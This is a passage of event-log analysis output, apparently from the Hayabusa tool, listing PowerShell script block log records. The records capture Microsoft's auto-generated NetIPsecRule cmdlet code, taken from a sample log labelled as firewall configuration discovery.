[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewal",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'Group",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Component', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, 